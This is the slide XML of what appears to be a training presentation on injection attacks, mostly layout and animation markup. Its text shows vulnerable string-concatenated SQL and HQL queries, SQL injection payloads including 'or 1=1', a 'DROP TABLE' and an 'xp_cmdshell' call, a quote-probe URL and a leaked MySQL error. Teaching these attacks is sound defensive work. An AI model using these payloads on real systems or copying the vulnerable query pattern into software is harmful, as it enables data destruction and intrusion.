            <a:pPr lvl="1" marL="742950" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="3800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>An identity can gain unauthorized privileges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85">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="585">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585">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="585">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetClass="entr" nodeType="withEffect" presetSubtype="0" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="585">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="585">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="14" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="16" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="585">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="585">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="18" presetClass="entr" nodeType="withEffect" presetSubtype="0" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="19" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="585">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58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585">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="585">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="26" presetClass="entr" nodeType="withEffect" presetSubtype="0" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="585">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="585">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="29" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="30" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="585">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="585">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="33" presetClass="entr" nodeType="withEffect" presetSubtype="0" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="34" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="585">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="585">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ID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="39" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="585">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="585">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="41" presetClass="entr" nodeType="withEffect" presetSubtype="0" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="42" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="585">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="585">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="44" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="45" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="46" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="585">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="585">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="48" presetClass="entr" nodeType="withEffect" presetSubtype="0" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="49" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="585">
                                            <p:txEl>
                                              <p:pRg st="11" end="11"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="585">
                                            <p:txEl>
                                              <p:pRg st="11" end="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585" grpId="1"/>
    </p:bldLst>
  </p:timing>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8" name="Types of Injection"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Types of Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1369" name="LDAP Queries SQL Queries XPath Queries Program Arguments OS Commands"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="2275840"/>
            <a:ext cx="11704322" cy="6436926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>LDAP Queries</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>SQL Queries</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>XPath Queries</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>Program Arguments</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>OS Commands</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373" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="883820" y="2695386"/>
            <a:ext cx="11237160" cy="2357635"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="11237159" cy="2357634"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1371" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="11237160" cy="2357635"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 9585"/>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650240">
                <a:tabLst>
                  <a:tab pos="647700" algn="l"/>
                </a:tabLst>
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1372" name="sqlString = &quot;SELECT HasShipped FROM&quot;…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="94128" y="275674"/>
              <a:ext cx="10668435" cy="2045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l" defTabSz="650240">
                <a:tabLst>
                  <a:tab pos="647700" algn="l"/>
                </a:tabLst>
                <a:defRPr sz="3500">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Lucida Sans Typewriter"/>
                  <a:ea typeface="Lucida Sans Typewriter"/>
                  <a:cs typeface="Lucida Sans Typewriter"/>
                  <a:sym typeface="Lucida Sans Typewriter"/>
                </a:rPr>
                <a:t>sqlString = "SELECT HasShipped FROM"</a:t>
              </a:r>
              <a:endParaRPr>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:ea typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
                <a:sym typeface="Lucida Sans Typewriter"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="650240">
                <a:tabLst>
                  <a:tab pos="647700" algn="l"/>
                </a:tabLst>
                <a:defRPr sz="3500">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Lucida Sans Typewriter"/>
                  <a:ea typeface="Lucida Sans Typewriter"/>
                  <a:cs typeface="Lucida Sans Typewriter"/>
                  <a:sym typeface="Lucida Sans Typewriter"/>
                </a:rPr>
                <a:t>	+ " OrderDetail WHERE OrderID ='"</a:t>
              </a:r>
              <a:endParaRPr>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:ea typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
                <a:sym typeface="Lucida Sans Typewriter"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="650240">
                <a:tabLst>
                  <a:tab pos="647700" algn="l"/>
                </a:tabLst>
                <a:defRPr sz="3500">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Lucida Sans Typewriter"/>
                  <a:ea typeface="Lucida Sans Typewriter"/>
                  <a:cs typeface="Lucida Sans Typewriter"/>
                  <a:sym typeface="Lucida Sans Typewriter"/>
                </a:rPr>
                <a:t>	+ ID + "'";</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1374" name="ALFKI1001…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1494648" y="5911920"/>
            <a:ext cx="9992926" cy="2895673"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="472965" indent="-472965">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="4000"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="845819" indent="-388619">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="3400"/>
            </a:pPr>
            <a:r>
              <a:t>ALFKI1001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="845819" indent="-388619">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="3400"/>
            </a:pPr>
            <a:r>
              <a:t>ALFKI1001' or 1=1 --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="845819" indent="-388619">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="3400"/>
            </a:pPr>
            <a:r>
              <a:t>ALFKI1001'; DROP TABLE OrderDetail --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="845819" indent="-388619">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="3400"/>
            </a:pPr>
            <a:r>
              <a:t>ALFKI1001'; exec xp_cmdshell('fdisk.exe') --</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378" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="167093" y="930092"/>
            <a:ext cx="12139430" cy="4001597"/>
            <a:chOff x="0" y="-651785"/>
            <a:chExt cx="12139429" cy="4001596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1376" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="-651786"/>
              <a:ext cx="12139431" cy="4001597"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 6100"/>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377" name="Query HQLQuery = session.createQuery(“FROM accounts…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="101686" y="-566453"/>
              <a:ext cx="11936057" cy="32159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l" defTabSz="914400">
                <a:defRPr sz="3400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="3400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr b="1"/>
                <a:t>Query HQLQuery = session.createQuery(“FROM accounts </a:t>
              </a:r>
              <a:endParaRPr b="1"/>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="3400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr b="1"/>
                <a:t>WHERE custID='“ + request.getParameter("id") + "'"); </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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2" name="Vulnerable ?"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Vulnerable ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1385" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1115741" y="2574356"/>
            <a:ext cx="9678691" cy="1660816"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9678689" cy="1660814"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1383" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="9678690" cy="1660815"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 117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384" name="www.site.com/page=1'"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="81073" y="585838"/>
              <a:ext cx="9516544" cy="489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l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>www.site.com/page=1'</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1388" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1115741" y="5464744"/>
            <a:ext cx="9678691" cy="2422076"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9678689" cy="2422075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1386" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="9678690" cy="2422076"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 8036"/>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387" name="Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="81073" y="714725"/>
              <a:ext cx="9516544" cy="13072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l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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2" name="Get Table Names"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Get Table Names</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1395" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1170078" y="2227420"/>
            <a:ext cx="10664643" cy="4272727"/>
